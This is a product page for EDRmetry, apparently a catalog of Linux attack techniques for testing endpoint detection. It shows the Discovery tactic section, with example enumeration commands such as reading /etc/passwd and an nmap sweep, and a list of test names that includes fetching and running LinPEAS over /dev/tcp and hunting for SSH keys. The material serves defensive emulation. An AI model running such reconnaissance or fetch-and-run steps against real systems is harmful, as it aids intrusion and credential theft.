EDRmetry Linux Matrix For Download / Self-Hosted - Comprehensive Hands-On Attack TTPs Catalog
- Buy now
- Learn more
1. EDRmetry Overview

Introduction
What you will get?
Goals / What to expect
EDRmetry Matrix
Virtual Machines / C2
EDRmetry Generic Flow
Contextual Execution
Changelog / Updates
2. EDRmetry Deployment

Deploy your EDRmetry Matrix Docker Container
Download EDRmetry Matrix JSON Database
Import your EDRmetry Matrix JSON Database
Provision your TARGET_X VM
Provision your KALI_X or C2_X VM
Request for HTTPS Hosted Access to EDRmetry Matrix
3. Research and emulation of Linux threats

MITRE ATT&CK TACTICS in the Linux Ecosystem
Linux Threat Landscape
Initial Access - TA0001
Discovery - TA0007
Execution - TA0002
Defense Evasion - TA0005
Persistence - TA0003
Privilege Escalation - TA0004
Exfiltration - TA0010
Command and Control - TA0011
Lateral Movement - TA0008
Credentials Access - TA0006
Impact - TA0040
Collection - TA0009

Discovery - TA0007

Objective:

Gather information about the system, network, and environment to inform the next steps. Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.
ID: TA0007
- https://attack.mitre.org/tactics/TA0007/

Linux Context:

Discovery on Linux uses built-in commands to map the landscape. who, w, or cat /etc/passwd lists users, while ps aux, top, or lsof reveals processes and open files. Network details emerge from netstat -tuln, ip a, or ss. Filesystem enumeration lsblk, df -h) identifies mounted drives and uname -a or cat /etc/os-release provides system info. Attackers may run nmap internally or query /proc for kernel details. In cloud environments, they explore container runtime docker ps) or Kubernetes APIs.

Key Techniques:

Account Discovery (T1087): Enumerating users and groups.
System Information Discovery (T1082): Checking kernel and distro versions.
Network Service Discovery (T1046): Scanning internal subnets.

Flow Example:

Running cat /etc/passwd | grep "sh$" to find shell users, or nmap -sn 192.168.1.0/24 to map the network.

Defender Strategies:

Log command execution with EDR, restrict access to /proc, and monitor network scans with IDS (e.g., Zeek).

The current list of corresponding EDRmetry test definitions includes:

EDR-T6065 - /proc/PID enumeration
EDR-T6036 - C2 randomized hostname lookups
EDR-T6050 - Check ASLR configuration
EDR-T6055 - Check bpf settings from /proc
EDR-T6265 - Dismap Asset Discovery
EDR-T6097 - Download and launch LinEnum
EDR-T6084 - Enumerate kernel modules
EDR-T6225 - Execute "What Server" Enumeration
EDR-T6040 - Execute LinPEAS from /dev/tcp
EDR-T6069 - Execute nping
EDR-T6259 - Find all suid/sgid files
EDR-T6260 - Find all writeable dirs
EDR-T6263 - Find SSH keys
EDR-T6223 - LKM Get Kernel Text Region Address
EDR-T6047 - Kcore Memory File Read
EDR-T6218 - Linux VM Check via Hardware
EDR-T6217 - Linux VM Check via Kernel Modules
EDR-T6124 - Local Network Discovery Scan
EDR-T6251 - Process Snooping with pspy
EDR-T6338 - Process Snooping with rspy
EDR-T6204 - Read local file using curl
EDR-T6068 - Sudo Enumeration
EDR-T6343 - DNS TXT request
EDR-T6276 - List capabilities of binaries
EDR-T6341 - Scan SSH services with SSHamble
EDR-T6372 - K8S - List RBAC permissions
EDR-T6374 - K8S - Enumerate nodes
EDR-T6373 - K8S - Enumerate pods
EDR-T6372 - K8S - List RBAC permissions